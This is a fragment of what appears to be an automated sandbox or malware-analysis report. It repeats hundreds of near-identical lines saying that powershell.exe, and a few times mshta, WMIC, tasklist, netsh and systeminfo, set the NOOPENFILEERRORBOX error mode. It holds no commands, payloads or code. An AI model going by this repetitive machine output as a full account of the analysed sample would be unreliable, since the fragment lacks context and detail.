Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
